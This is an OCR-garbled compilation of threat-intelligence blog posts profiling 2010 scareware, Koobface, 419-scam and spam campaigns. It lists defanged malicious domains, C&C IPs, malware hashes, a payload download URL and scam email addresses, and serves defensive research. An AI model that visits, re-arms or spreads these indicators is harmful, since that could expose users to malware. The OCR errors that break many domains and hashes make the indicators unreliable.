hxxp://tmnttoys.com 

hxxp://in-prague.com 

hxxp://backya rdcreations.org 

hxxp://the-flooring-connection.com 

hxxp://sasm.net 

hxxp://i ndefenseof.com 

hxxp://u raband.com 

hxxp://i-need-a-websitedesi gned.com 

hxxp://h whitecustomhomes.com 

hxxp://scottiesautobody.com 



We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Rogue Scareware Dropping 
Campaign Spotted in the Wild Courtesy of the 
Koobface 

Gang (2018-10-21 23:02) 

It's 2010 and I've recently came across to a diverse portfolio 
of fake security software also known as scareware 

courtesy of the Koobface gang in what appears to be a 

[ljdirect connection between the gang's activities 
and the 

Russian Business Network. 

In this post I'll provide actionable intelligence on the 
infrastructure behind it and discuss in-depth the tactics 

techniques and procedures of the cybercriminals behind 
including the direction establishment of a direct connection 

between the gang's activities and a well-known Russian 
Business Network customer. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://piremover.eu/hitin.php?affid=02979 - 
212.117.161.142; 95.211.27.154; 95.211.27.166 

Once executed a sample malware (MD5: 
eedac4719229a499b3118f87f32fae35) phones back 
to the follow- 



ing malicious C &C server IPs: 

hxxp://xmiueftbmemblatlwsrj.cn/get.php?id=02979 - 
91.207.116.44 - Email: robertsimonkroon@gmail.com 

Known domains known to have responded to the 
same malicious C &C server IPs: 

hxxp://aahsd vsynrrmwnbmpklb.cn 

hxxp://d I ukhonqzidfpphkbjpb.cn 

hxxp://bary kcpveiwsgexkitsg.cn 

hxxp://bfichgfqjqrtkwrsegoj.cn 

hxxp://d hbomnljzgiardzlzvkp.cn 

Once executed a sample malware phones back to the 
following malicious C &C service IPs: 

hxxp://xmi ueftbmemblatlwsrj.cn 

hxxp://urodinam.net - which is a [2]well known 

[3] Koobface 1.0 C &C server domain IP also seen in the " 

[4] Mass DreamHost Sites Compromise" exclusively 
profiled in this post. 

hxxp://xmi ueftbmemblatlwsrj.cn 

Once 

executed 

a 


sample 



malware 


MD5: 

66dc85ad06e4595588395b2300762660; 

MD5: 

91944c3ae4a64c478bfba94e9e05b4c5 phones back 
to the following malicious C &C server IPs: 

hxxp://proxim.ntkrnlpa.info - 83.68.16.30 - seen and 
observed in related analysis regarding the [5]mass 
Embassy 

Web site compromise throughout 2007 and 2009. 

Successfully dropping the following malicious Koobface MD5 

hxxp://harmonyhudospa.se/.sys/?getexe=f b.70.exe 

Related malicious MD5s (MD known to have 
participated in the campaign: 

MD5:66dc85ad06e4595588395b2300762660 

MD5: 8282ea8e92f40eel3ab716daf2430145 

Once executed a sample malware phones back to the 
following malicious C &C server IPs: 

hxxp://tehnocentr.chita.ru/.sys 

hxxp://gvpschekschov.iv-edu.ru/.sys/?action=fbgen 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 



1. https://ddanchev.blo as pot.com/2017/05/historical-osint- 
inside-2QQ7-2QQ9.html 


2. https://draft.blo aa er.com/ 
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3. https://ddanchev.blo as pot.com/201Q/Q5/koobface- a an a- 
res ponds-to-lQ-thin a s- vou.html 

4. https://ddanchev.blo as pot.com/2QlQ/Q5/dissectin a -mass- 
dreamhost-sites.html 

5. https://ddanchev.blo as pot.com/2Q17/Q5/historical-osint- 
inside-2QQ7-2QQ9.html 
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Historical OSINT - Profiling a Portfolio of Active 419- 
Themed Scams (2018-10-21 23:08) 

It's 2010 and I've recently decided to provide actionable 
intelligence on a variety of 419-themed scams in particular 

the actual malicious actors behind the campaigns with the 
idea to empower law enforcement and the community 

with the necessary data to track down and prosecute the 
malicious actors behind these campaigns. 

Related malicious and fraudulent emails known to 
have participated in the campaign: 

david _ikemba@supereme-loan-finance.com - 96.24.14.4 

charles.maynardl@gmx.com - 218.31.134.111 

mr.karimahmed2004@msn.com - 41.203.231.82 



















fedexdelivryservices@yahoo.com.hk - 89.187.142.72 

chevrondisbursement@hotmail.com - 41.138.182.245 

mrslindahilldeskOOOOO@hotmail.co.uk - 41.138.188.45 

natt.westt@live.com - 115.242.40.142 

googlellanniversary2010@live.com - 115.240.21.112 

barjamessmith@qatar.io - 115.242.94.153 

delata _ecobank@web2mail.com - 202.58.64.18 

junhuan9@yahoo.cn - 68.190.243.51 

fairlandindustryltd@mail.ru - 41.138.190.213 

shkhougal@aol.com - 80.35.222.9 

jamestimeswel@rogers.com - 203.170.192.4 

alimubarakhm@hotmail.com - 115.134.5.245 

godwinemefiele2010@hotmail.com - 41.211.229.65 

skyebankplclagosnigera@gmail.com, 
skyebankplclagosnigera@zapak.com - 41.138.178.241 

contact.alcchmb@sify.com - 116.206.153.50 

officelottery94@yahoo.com.hk - 124.122.145.226 

kadamluk@live.com - 41.217.65.14 

garycarsonuk@w.cn - 220.225.213.221 

Stella _willson48@yahoo.co.uk - 82.196.5.120 



trustlink@vv.cn - 87.118.82.8 

george201009@hotmail.com - 59.120.137.197 

drmannsurmuhtarrr_155@yahoo.cn, 
mrstreasurecollinnsss@gmail.com - 82.114.78.222 
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Historical OSINT - Yet Another Massive Blackhat SEO 
Campaign Spotted in the Wild (2018-10-21 23:21) 

It's 2010 and I've recently stumbled upon yet another 
diverse portfolio of blackhat SEO domains this time serving 

rogue security software also known as scareware to 
unsuspecting users with the cybercriminals behind the 
campaign 

successfully earning fraudulent revenue in the process of 
monetizing access to malware-infected hosts largely relying 

on the utilization of an affiliate-network based type of 
revenue sharing scheme. 

In this post I'll profile the infrastructure behind the 
campaign and provide actionable intelligence on the in¬ 
frastructure behind it. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://arnald uatis.com 

hxxp://bati staluciano.com 

hxxp://bethemed ia.net 



hxxp ://bri de-beautiful, com 

hxxp://bu rgessandsons.com 

hxxp ://carol inacane.com 

hxxp ://cau lfieldband.com 

hxxp ://i mprovenewark.com 

hxxp ://marsmel low. info 

hxxp ://nood I esonline.com 

hxxp ://q ueenslumber.com 

hxxp ://thesol idwoodflooringcompany.com 

hxxp ://wi relessexpertise.com 

hxxp://bigbangexpress.com 

hxxp ://bi oresonantie.net 

hxxp://clubipg.com 

hxxp://djdior.com 

hxxp ://dj ektoyz.com 

hxxp ://getraen kepool.com 

hxxp ://hartman pescar.com 

hxxp://hetkaashuis.com 

hxxp://menno.info 

hxxp ://pi anoaccompanistcompetition.com 



hxxp://sou ndwitness.org 
hxxp:/strij kvrij.com 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild Drops Scareware (2018-10-21 
23:37) 

It's 2010 and I've recently intercepted a currently active 
malicious and fraudulent blakchat SEO campaign success¬ 
fully enticing users into interacting with rogue and 
fraudulent scareware-serving malicious and fraudulent 
campaigns. 

In this post I'll profile the infrastructure behind the 
campaign and provide actionable intelligence on the in¬ 
frastructure behind it. 

Sample URL redirection chain: 

hxxp://noticexsummary.com/re.php?lnk= 1203597664 - 
87.255.55.231 

- hxxp://new-pdf-reader.com/l/promo/index.asp?aff=11677 - 
66.207.172.196 

= hxxps://secu re-signupway.com/promo/join.aspx? 
siteid = 3388 

Related malicious domains known to have 
participated in the campaign: 


hxxp://noti cexsummary.com/ 



Related malicious domains known to have 
participated in the campaign: 

hxxp://online-tv-on-your-pc.com/p2/index.asp?aff= 11680 
&camp=unsub 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Yet Another Massive Blackhat SEO 
Campaign Spotted in the Wild Drops Scareware 

(2018-10-21 23:47) 

It's 2010 and I've recently came across to a currently active 
malicious and fraudulent blackhat SEO campaign success¬ 
fully enticing users into interacting with rogue and 
fraudulent scareware-serving malicious and fraudulent 
campaigns. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://g I obals-advers.com 

hxxp://al Id iskscheck300.com 

hxxp://mu ltisearchl.com 

hxxp://myfreespace3.com 

hxxp://hottystars.com 



hxxp://mu ltilangl.com 
hxxp://3gigabytes.com 
hxxp://d rivemedirect.com 
hxxp://g I obala2.com 
hxxp://teled isons.com 
hxxp://theworl dnews5.com 
hxxp://vi rtualblog5.com 
hxxp://g rander5.com 
hxxp://5starsblog.com 
hxxp://g I obalreds.com 
hxxp://g I obal-advers.com 
hxxp://ratemyblogl.com 
hxxp://g reatvideo3.com 
hxxp://beg inner2009.com 
hxxp://fastwebway.com 
hxxp://bl azervips.com 
hxxp://beg in2009.com 
hxxp://megatradetds0.com 
hxxp://secu redonlinewebspace.com 
hxxp://proweb-i nfo.com 



hxxp://secu rity-www-clicks.com 

hxxp://u pdatedownloadlists.com 

hxxp://styl eon lyclicks.cn 

hxxp://i nformationgohere.com 

hxxp://world-cl ick-service.com 

hxxp://secutitypowercl icks.cn 

hxxp://secu redclickuser.cn/ 

hxxp://sl ickoverview.com 

hxxp://viewyou rclicks.com 

hxxp://cl ickwww2.com 

hxxp://cl ickadsystem.com 

hxxp://becomepoweruser.cn 

hxxp://cl ickoverridesystem.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://protected user.cn 
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hxxp://i nternetprotectedweb.com/ 
hxxp://cl icksadssystems.com 
hxxp://wherei smyclick.cn 



hxxp://tru stourclicks.cn 

hxxp://gol denstarclick.cn 

hxxp://defendedsystemuser.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://d rivemedirect.com 

hxxp://vi rtualblog5.com 

hxxp://fastwebway.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Spamvertized Swine Flu Domains - 
Part Two (2018-10-21 23:50) 

It's 2010 and I've recently came across to a currently active 
diverse portfolio of Swine Flu related domains further 

enticing users into interacting with rogue and malicious 
content. 

In this post I'll profile and expose a currently active 
malicious domains portfolio currently circulating in the 

wild successfully involved in an ongoing variety of Swine Flu 
malicious spam campaigns and will provide actionable 

intelligence on the infrastructure behind it. 



Related malicious domains known to have 
participated in the campaign: 

hxxp://pehwitew.cn - 58.17.3.44; 58.20.140.5; 
220.248.167.126; 60.191.221.116; 110.52.6.252 

Related name servers known to have participated 
the campaign: 

hxxp://ns6.plusspice.com - 110.52.6.252 
hxxp://ns2. morewhole.com 
hxxp://ns2.extol share.com 
hxxp://ns2. pridesure.com 
hxxp://ns2. swell wise, com 
hxxp://ns4. boostwise.com 
hxxp://ns6. maxitrue.com 
hxxp://ns4. sharezeal.com 
hxxp://ns2. extol calm, com 
hxxp://ns4. humortan.com 
hxxp://ns2 .joysheer.com 
hxxp://ns2. zestleads.com 
hxxp://ns4.fizz leads.com 
hxxp://ns4. maxi great.com 
hxxp://ns4.spicy rest.com 



hxxp://ns4.hardyzest.com 
hxxp://ns2.resttrust.com 
hxxp://ns2.alertwow.com 
hxxp://ns2.savetangy.com 
hxxp://ns4.1 ovetangy.com 
hxxp://ns2.coyrosy.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://jihpuyab.cn 

hxxp ://dabwed ib.cn 

hxxp://j eh rawob.cn 

hxxp://lacgidub.cn 

hxxp://fektiyub.cn 

hxxp://qucmolac.cn 

hxxp://xopfekec.cn 

hxxp://gamfesec.cn 

hxxp://xokdemic.cn 

hxxp://papxunic.cn 

hxxp://jiqlosic.cn 

hxxp://liynaloc.cn 



hxxp://womrifuc.cn 

hxxp://picduluc.cn 
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hxxp://feqtawuc.cn 

hxxp://becfuzuc.cn 

hxxp://xi mnusad.cn 

hxxp://limyoxed.cn 

hxxp://cokgozed.cn 

hxxp://qursehod.cn 

hxxp://pimfilod.cn 

hxxp://zofxitod.cn 

hxxp://pehd iwod.cn 

hxxp://ru vvabud.cn 

hxxp://japwolud.cn 

hxxp://qolqaqaf.cn 

hxxp://tacreyaf.cn 

hxxp://rajvufef.cn 

hxxp://hiwjadif.cn 

hxxp://pejjenif.cn 

hxxp://hakya bof.cn 



hxxp://rijgi hag .cn 

hxxp://pipgaqag.cn 

hxxp://j axkewag.cn 

hxxp://ci kqumog.cn 

hxxp://tircodug.cn 

hxxp://juryaqug.cn 

hxxp://yawfadah.cn 

hxxp://yabtudah.cn 

hxxp://qifhihah.cn 

hxxp://xeyselah.cn 

hxxp://cotmetah.cn 

hxxp://bulmitah.cn 

hxxp://tegbejih.cn 

hxxp://tuymokih.cn 

hxxp://modqopoh.cn 

hxxp://qejpoduh.cn 

hxxp://xaj somuh.cn 

hxxp://wisziruh.cn 

hxxp://maypajej.cn 

hxxp://tivhikej.cn 



hxxp://holmayej.cn 

hxxp://dabtizej.cn 

hxxp://koyxuwij.cn 

hxxp://romxebuj.cn 

hxxp://hilzuluj.cn 

hxxp://zulfavuj.cn 

hxxp://voj howuj.cn 

hxxp://daldukak.cn 

hxxp://ra kvirak.cn 

hxxp://fimresak.cn 

hxxp://zepyosak.cn 

hxxp://tovpi wak.cn 

hxxp://raqhizak.cn 
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hxxp://salhibik.cn 

hxxp://xonzulik.cn 

hxxp://jezwutik.cn 

hxxp://lungodok.cn 

hxxp://qeytakok.cn 

hxxp://weswu kuk.cn 



hxxp ://l awmamuk.cn 

hxxp://xomhoruk.cn 

hxxp://zitkowuk.cn 

hxxp://hoyzexuk.cn 

hxxp://cutholal.cn 

hxxp://jidtecel.cn 

hxxp://jovmuhil.cn 

hxxp://guxdipil.cn 

hxxp://kujkuwil.cn 

hxxp://kojvifol.cn 

hxxp://zitgohol.cn 

hxxp://cosxotol.cn 

hxxp ://wah woxol.cn 

hxxp://siqsayol.cn 

hxxp://pipwoqul.cn 

hxxp://zilfumam.cn 

hxxp://fokvidem.cn 

hxxp://vamhefem.cn 

hxxp ://h ipxetem.cn 

hxxp://hasrozem.cn 



hxxp://yovbafim.cn 

hxxp://zutgaqim.cn 

hxxp://kamnorim.cn 

hxxp://nussotim.cn 

hxxp://yiblegom.cn 

hxxp://vorteyom.cn 

hxxp://mokg upum.cn 

hxxp://xen nesum.cn 

hxxp://fesh ivum.cn 

hxxp://nakca ban.cn 

hxxp://yaxxokan.cn 

hxxp://qikciqan.cn 

hxxp://gagsuran.cn 

hxxp://bopxuran.cn 

hxxp://g iwduvan.cn 

hxxp://gixreqin.cn 

hxxp://leccatin.cn 

hxxp://jollipon.cn 

hxxp://vuzlopon.cn 

hxxp://butkoxon.cn 



hxxp://falyewun.cn 

hxxp://noscajap.cn 

hxxp://xirqocep.cn 

hxxp://daqdohep.cn 
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hxxp://wokvarep.cn 

hxxp://hoggudip.cn 

hxxp://heqfavip.cn 

hxxp://j owrewip.cn 

hxxp://cimqiqop.cn 

hxxp://cibqobup.cn 

hxxp://zijreyup.cn 

hxxp://tosnabaq.cn 

hxxp://tochekaq.cn 

hxxp://cosmoqaq.cn 

hxxp://zavnusaq.cn 

hxxp://vufsaqeq.cn 

hxxp://dagligiq.cn 

hxxp://wugjaziq.cn 

hxxp://fepsu woq.cn 



hxxp://pombeyoq.cn 

hxxp://dokcokuq.cn 

hxxp://diwsutuq.cn 

hxxp://sayj umar.cn 

hxxp://jidxurer.cn 

hxxp://qalhiyir.cn 

hxxp://goqtoqor.cn 

hxxp://gaxdavor.cn 

hxxp://kazqikas.cn 

hxxp://piskeces.cn 

hxxp://qamhad is.cn 

hxxp://wifdixis.cn 

hxxp://hejhelos.cn 

hxxp://hed wimos.cn 

hxxp://kerrucus.cn 

hxxp://forhalus.cn 

hxxp://fesnupus.cn 

hxxp://lanzuhat.cn 

hxxp://kad mepat.cn 

hxxp://potzoyat.cn 



hxxp://j upkevet.cn 

hxxp://xagmiqit.cn 

hxxp://woxjatit.cn 

hxxp://gukpuxit.cn 

hxxp://dubpacut.cn 

hxxp://nifbihut.cn 

hxxp://q unkofav.cn 

hxxp://vippogav.cn 

hxxp://rimjulav.cn 

hxxp://kemhenav.cn 

hxxp://gutziqav.cn 

hxxp://gipbilev.cn 

hxxp://kaxcidiv.cn 

hxxp://xaj wawov.cn 

hxxp://rej coyov.cn 
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hxxp://jogsuduv.cn 
hxxp://l amfoguv.cn 
hxxp://daxtoh uv.cn 
hxxp://mi hwuxuv.cn 



hxxp://h iwjuhaw.cn 
hxxp://gohkijaw.cn 
hxxp://tu wqetaw.cn 
hxxp://lacjebew.cn 
h xx p://vod rub ew.cn 
hxxp://peh witew.cn 
hxxp://yezxewew.cn 
hxxp://yuvsobow.cn 
hxxp://yod mapow.cn 
hxxp://qotpobuw.cn 
hxxp://meg rafuw.cn 
hxxp://zamponuw.cn 
hxxp://kotzeq uw.cn 
hxxp://yud maruw.cn 
hxxp://hamq iruw.cn 
hxxp://si wwawuw.cn 
hxxp://veq niwuw.cn 
hxxp://bepnudax.cn 
hxxp://jehfefax.cn 
hxxp://boxj okex.cn 



hxxp://yoclerex.cn 

hxxp://guzjacix.cn 

hxxp://mexcekix.cn 

hxxp://kibtixix.cn 

hxxp://conyixix.cn 

hxxp://famlojox.cn 

hxxp://jizwalox.cn 

hxxp://dah howox.cn 

hxxp://zicquvtx.cn 

hxxp://cavxuj ux.cn 

hxxp://voqnolux.cn 

Known to have responded to the same malicious IP 
(60.191.221.123) are also the following malicious do¬ 
mains: 

hxxp://vitsulob.cn 
hxxp://jahnivub.cn 
hxxp://wi pviyub.cn 
hxxp://gokbulac.cn 
hxxp://bedqaqac.cn 
hxxp://su vnuqac.cn 



hxxp://wukcilec.cn 

hxxp://lukbolec.cn 

hxxp://juhfaqic.cn 

hxxp://mixwiqic.cn 

hxxp://qikloric.cn 

hxxp://halgiyic.cn 
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hxxp://jocvoloc.cn 

hxxp://g ugmikad.cn 

hxxp://zoqvulad.cn 

hxxp://zokdoled.cn 

hxxp://daxlated.cn 

hxxp://cahnubid.cn 

hxxp://cufxu hod.cn 

hxxp://libsorod.cn 

hxxp://vopqatod.cn 

hxxp://cebvoyod.cn 

hxxp://lansocud.cn 

hxxp://zohpakud.cn 

hxxp://hekwasud.cn 



hxxp://niknuvud.cn 

hxxp://mey mu haf.cn 

hxxp://n igkojef.cn 

hxxp://bazmoyef.cn 

hxxp://roszadif.cn 

hxxp://sapmofif.cn 

hxxp://kudxodof.cn 

hxxp://pefkipof.cn 

hxxp://xoq resof.cn 

h xx p://fi pxevof.cn 

hxxp://quyzeluf.cn 

hxxp://xujyeruf.cn 

hxxp://xenpikeg.cn 

hxxp://tafwohig.cn 

hxxp://kowtuhig.cn 

hxxp://dinpisig.cn 

hxxp://teryuvig.cn 

hxxp://funcizig.cn 

hxxp://ciytamog.cn 

hxxp://j emsowog.cn 



hxxp://kiqzijug.cn 

hxxp://pulfaxug.cn 

hxxp://wojlabah.cn 

hxxp://belzejah.cn 

hxxp://pefdovah.cn 

hxxp://xijsameh.cn 

hxxp://racridih.cn 

hxxp://rewfahih.cn 

hxxp://vihxujih.cn 

hxxp://qujvosih.cn 

hxxp://figqacuh.cn 

hxxp://xoh mol uh.cn 

hxxp://jicniwuh.cn 

hxxp://kapxuraj.cn 

hxxp://j ubjavaj.cn 

hxxp://bidkuqej.cn 

hxxp://jarvixej.cn 
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hxxp://qinzidij.cn 

hxxp://zagzafij.cn 



hxxp://merjuwij.cn 

hxxp://weqbujuj.cn 

hxxp://gucdaluj.cn 

hxxp://modxowuj.cn 

hxxp://tobponak.cn 

hxxp://tacjujek.cn 

hxxp://fumliqek.cn 

hxxp://wavfebik.cn 

hxxp://xizqibik.cn 

hxxp://focnigik.cn 

hxxp://biqmipik.cn 

hxxp://zowcoq ik.cn 

hxxp://fexsitik.cn 

hxxp://qebdevik.cn 

hxxp://xolkisok.cn 

hxxp://kuq wuwok.cn 

hxxp://g unwonuk.cn 

hxxp://hewq uvuk.cn 

hxxp://gunbaqal.cn 

hxxp://seysixal.cn 



hxxp://zay mamel.cn 
hxxp://weznohil.cn 
hxxp://keczakil.cn 
hxxp://wawberol.cn 
hxxp://naftemul.cn 
hxxp://sed bonam.cn 
hxxp://vel wapam.cn 
hxxp://zinzutam.cn 
hxxp://n udgixam.cn 
hxxp://mi bpabem.cn 
hxxp://yol baqem.cn 
hxxp://fogduqem.cn 
hxxp://qawtotem.cn 
hxxp://qalfusim.cn 
hxxp://kocg uwim.cn 
hxxp://zishikom.cn 
hxxp://kozpi pom.cn 
hxxp://loblahum.cn 
hxxp://wi nbomum.cn 
hxxp://j akmezum.cn 



hxxp://taglolan.cn 
hxxp://suzn uwan.cn 
hxxp://j ekwazan.cn 
hxxp://toxmijen.cn 
hxxp://nikguzen.cn 
hxxp://ded mewin.cn 
hxxp://j ebvuwun.cn 
hxxp://tupsikap.cn 
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hxxp://dudsuzap.cn 

hxxp://yessafep.cn 

hxxp://danxenep.cn 

hxxp://leklidip.cn 

hxxp://duklimip.cn 

hxxp://yevnu rip.cn 

hxxp://virrotip.cn 

hxxp://lalyezop.cn 

hxxp://jaztecup.cn 

hxxp://gokbehup.cn 

hxxp://cuqyirup.cn 



hxxp://gajvizup.cn 

hxxp://cahwikaq.cn 

hxxp://xeqbelaq.cn 

hxxp://xicbamaq.cn 

hxxp://qofqoneq.cn 

hxxp://g ivxuyeq.cn 

hxxp://gonganiq.cn 

hxxp://vijsoziq.cn 

hxxp://bignijoq.cn 

h xx p://j ejroxoq.cn 

hxxp://culfunuq.cn 

hxxp://qevxayuq.cn 

hxxp://merwosar.cn 

hxxp ://l oxvafer.cn 

hxxp://cawnamir.cn 

hxxp://wocyorir.cn 

h xx p://to khador.cn 

hxxp://yuznisor.cn 

hxxp://vamtator.cn 

hxxp://gojligur.cn 



hxxp://vukqejur.cn 

h xx p://fewxo pur.cn 

hxxp://wu kwoxur.cn 

hxxp://bavyoxur.cn 

hxxp://jegdufas.cn 

hxxp://rillefes.cn 

hxxp://n iwwages.cn 

hxxp://comra mes.cn 

hxxp://rohfapes.cn 

hxxp://lehredis.cn 

hxxp://jepniwos.cn 

hxxp://lexxedus.cn 

hxxp://xuljuhus.cn 

hxxp://levgepat.cn 

hxxp://mod hewet.cn 

hxxp://kawlozet.cn 

hxxp://bufsofit.cn 

hxxp://gekloyit.cn 

h xx p://te rcifot.cn 
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hxxp://yughaqut.cn 

hxxp://surfabav.cn 

hxxp://y utbevav.cn 

hxxp://mowvahev.cn 

hxxp://tu wcexev.cn 

hxxp://liqfimiv.cn 

hxxp://pefxamuv.cn 

hxxp://goqdexuv.cn 

hxxp://fozlubaw.cn 

hxxp://yuxcizaw.cn 

hxxp://mevvu bew.cn 

hxxp://n uzzuhew.cn 

hxxp://dibkicow.cn 

hxxp://lobrakow.cn 

hxxp://vuksi row.cn 

hxxp://sa mnuvow.cn 

hxxp://jizlotuw.cn 

hxxp://buzgikax.cn 

hxxp://j awcesax.cn 

hxxp://qatvegex.cn 



hxxp://gegfejex.cn 
hxxp://cigxekex.cn 
hxxp://kejjobox.cn 
hxxp://yosbucox.cn 
hxxp://kel mogox.cn 
hxxp://j eqyuzox.cn 
hxxp://jocxebux.cn 
hxxp://ta wcizux.cn 
hxxp://kittokay.cn 
hxxp://seryusay.cn 
hxxp://nocbusey.cn 
hxxp://semfi hiy.cn 
h xx p://xotg ajiy.cn 
h xx p://sa rvujiy.cn 
hxxp://gicmosiy.cn 
hxxp://fulpaziy.cn 
hxxp://cu nzumoy.cn 

Related malicious name servers known to have 
participated in the campaign: 


hxxp://ns2.boostaroma.com - 110.52.6.252 



hxxp://ns2.oku ltra.com 
hxxp://ns2.swellfab.com 
hxxp://ns2.shehead.com 
hxxp://ns2.atbread.com 
hxxp://ns2 .treatglad.com 
hxxp://ns2.pl umbold.com 
hxxp://ns2.callold.com 
hxxp://u p2.thicksend.com 
hxxp://ns6.zestkind.com 
hxxp://ns2. burn round.com 
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hxxp://ns2. witproud.com 
hxxp://ns2 .fizznice.com 
hxxp://ns6.pi usspice.com 
hxxp://u p2.hu maneagree.com 
hxxp://ns2.adorewee.com 
hxxp://ns4.ki ndable.com 
hxxp://ns2. prideable.com 
hxxp://ns2.cuddly humble.com 
hxxp://ns2.ablewhole.com 



hxxp://ns2.q uickwhole.com 
hxxp://ns2.pl umpwhole.com 
hxxp://u p2.begancome.com 
hxxp://u p2.sizeplane.com 
hxxp://u p2.colonytype.com 
hxxp://ns6. prizeaware.com 
hxxp://ns2. pridesure.com 
hxxp://ns2 .toophrase.com 
hxxp://ns2.1 oyalrise.com 
hxxp://u p2.pathuse.com 
hxxp://ns2.dimplechaste.com 
hxxp://ns2. welltrue.com 
hxxp://ns2.ziptrue.com 
hxxp://ns2.si I verwe.com 
hxxp://ns2.cal mprize.com 
hxxp://ns2 .firmrich.com 
hxxp://ns2.activeinch.com 
hxxp://ns2.cookmulti.com 
hxxp://ns2. well moral.com 
hxxp://ns2. peakswell.com 



hxxp://ns2. posewill.com 
hxxp://ns2.d roolcool.com 
hxxp://u p2.cuddlypoem.com 
hxxp://ns2.1 oyalcalm.com 
hxxp://ns2.extol calm.com 
hxxp://ns2. rad iothan.com 
hxxp://u p2.persontrain.com 
hxxp://ns2. a wardfun.com 
hxxp://ns4.zeal reap.com 
hxxp://ns2.piousreap.com 
hxxp://ns2 .firstreap.com 
hxxp://ns2.grandzap.com 
hxxp://ns2. royalzap.com 
hxxp://ns6.ablezip.com 
hxxp://ns2.zapeager.com 
hxxp://u p2.blockfather.com 
hxxp://ns2.breezycorner.com 
hxxp://ns2.donewater.com 
hxxp://ns2.1 istenflower.com 
hxxp://ns2.dimplechair.com 



hxxp://u p2.yardcolor.com 
91 


hxxp://ns4.fizz leads.com 
hxxp://u p2.fi nestgrass.com 
hxxp://ns2. prizebeats.com 
hxxp://ns4. maxi great.com 
hxxp://ns2 .flairtreat.com 
hxxp://u p2.tingleflat.com 
hxxp://ns6.proudquiet.com 
hxxp://ns2. morequiet.com 
hxxp://ns2.drool pi anet.com 
hxxp://u p2.giftedunit.com 
hxxp://ns2.sol arwit.com 
hxxp://ns2. ropemeant.com 
hxxp://ns2. paradiseobedient.com 
hxxp://ns4. paradiseobedient.com 
hxxp://u p2.minealert.com 
hxxp://ns4.spicy rest.com 
hxxp://ns4.alertjust.com 
hxxp://ns2.resttrust.com 



hxxp://ns2.pagefew.com 

hxxp://ns2. mu ltiaglow.com 

hxxp://ns2.objectallow.com 

hxxp://ns2.alertwow.com 

hxxp://ns2.al ivejuicy.com 

hxxp://ns2. restjuicy.com 

hxxp://ns2 .funcomfy.com 

hxxp://ns2.solarcomfy.com 

hxxp://ns2. prizetangy.com 

hxxp://ns2. wholehappy.com 

hxxp://ns2.prideeasy.com 

hxxp://ns2.suddeneasy.com 

hxxp://ns2 .treatrosy.com 

hxxp://ns2.earl ytwenty.com 

Related malicious domains ki 
participated in the campaign 

hxxp://xiskizop.cn 


58.17.3.44; 


60.191.239.189; 


to have 



203.93.208.86 


hxxp://ns5. prizeaware.com; 

hxxp://nsl.grandzap.com; hxxp://ns3.alertjust.com 

Related malicious domains known to have 
participated in the campaigns: 

hxxp://xancefab.cn 

hxxp://busgihab.cn 

hxxp://putcojab.cn 

hxxp://nizvonab.cn 

hxxp://bulpapab.cn 

hxxp://laztoqab.cn 

hxxp://varsesab.cn 

hxxp://pahdeheb.cn 

hxxp://wiqponeb.cn 

hxxp://ru tfuseb.cn 

hxxp://zacniyeb.cn 

hxxp://beblelib.cn 
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hxxp://gahvosib.cn 



hxxp://rigzowib.cn 

hxxp://bacnaxib.cn 

hxxp://pexyufob.cn 

hxxp://sowgugob.cn 

hxxp://buhbulob.cn 

hxxp://ciybufub.cn 

hxxp://xodd imub.cn 

hxxp://nugtaqub.cn 

hxxp://buvkuzub.cn 

hxxp://fikqebac.cn 

hxxp://pevremac.cn 

hxxp://qokbasac.cn 

hxxp://patmebec.cn 

hxxp://kuntigec.cn 

hxxp://jolcekec.cn 

hxxp://wihjorec.cn 

hxxp://fixruyec.cn 

hxxp://gospozec.cn 

hxxp://batrijic.cn 

hxxp://rebzomic.cn 



hxxp://loq rupic.cn 

hxxp://diqhaqic.cn 

hxxp://bohkoqic.cn 

hxxp://beszesic.cn 

hxxp://tuzhovic.cn 

hxxp://hesyuvic.cn 

hxxp://kovhewic.cn 

hxxp://lufreyic.cn 

hxxp://noxrazic.cn 

hxxp://lefviboc.cn 

hxxp://fodcuboc.cn 

hxxp://pevhihoc.cn 

hxxp://widlajoc.cn 

hxxp://zocwol oc.cn 

hxxp://janpupoc.cn 

hxxp://mefbuqoc.cn 

hxxp://hujqezoc.cn 

hxxp://capjebuc.cn 

hxxp://befqacuc.cn 

hxxp://socjujuc.cn 



hxxp://qivbiruc.cn 

hxxp://tuxbaxuc.cn 

hxxp://tidsuyuc.cn 

hxxp://kapdacad.cn 

hxxp://lagfagad.cn 

hxxp://japtugad.cn 

hxxp://bechu mad.cn 

hxxp://holceqad.cn 

hxxp://bectusad.cn 
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hxxp://ta bzuwad.cn 

hxxp://red nezad.cn 

hxxp://megzizad.cn 

h xx p://f orvafed.cn 

hxxp://hojliged.cn 

hxxp://fuxcexed.cn 

hxxp://baxpuxed.cn 

hxxp://lugjized.cn 

hxxp ://l ewdozed.cn 

hxxp://hiszedid.cn 



hxxp://buyquhid.cn 

hxxp://wovyokid.cn 

hxxp://yojvimid.cn 

hxxp://widxixid.cn 

hxxp://yovxoxid.cn 

h xx p ://rey wuf od. c n 

hxxp://h ubzahod.cn 

hxxp://qapzekod.cn 

hxxp://falxalod.cn 

hxxp://yiznunod.cn 

hxxp://towqotod.cn 

hxxp://loxlayod.cn 

hxxp://rockozod.cn 

hxxp://j oh mabud.cn 

hxxp://muvyucud.cn 

hxxp://vattehud.cn 

hxxp://fuytejud.cn 

hxxp://kenyilud.cn 

hxxp://cibsa rud.cn 

hxxp://najsatud.cn 



hxxp://xi bwazud.cn 
hxxp://laztafaf.cn 
hxxp://piynosaf.cn 
hxxp://yelpidef.cn 
hxxp://yagtudef.cn 
h xx p://l evxifef.cn 
h xx p://p ovxajef.cn 
hxxp://hetbetef.cn 
hxxp://h udvotef.cn 
h xx p ://h e mf o wef. c n 
hxxp://coqvazef.cn 
hxxp://yawhoj if.cn 
hxxp://muvcewif.cn 
hxxp://xadgobof.cn 
